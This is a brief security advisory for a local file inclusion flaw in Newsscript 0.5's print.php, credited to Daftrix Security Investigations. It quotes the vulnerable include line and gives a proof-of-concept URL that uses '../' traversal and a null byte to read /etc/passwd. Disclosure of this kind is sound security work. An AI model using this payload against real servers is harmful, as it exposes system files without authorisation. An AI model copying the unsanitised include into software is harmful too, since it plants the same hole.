— "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "
— "Newsscript version 0.5"
— Emaill - [email protected]
— Website - http://webmaster-journal.com
—http://www.comscripts.com/scripts/php.wm-news.203.html
— Vulnerable code in print/print.php
— $ide var is not sanitized and can be used to include files from local resources
— 27 include($file_name);
— http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00
— Daftrix[at]Gmail.com
— Daftrix Security Investigations
— http://www.daftrix.com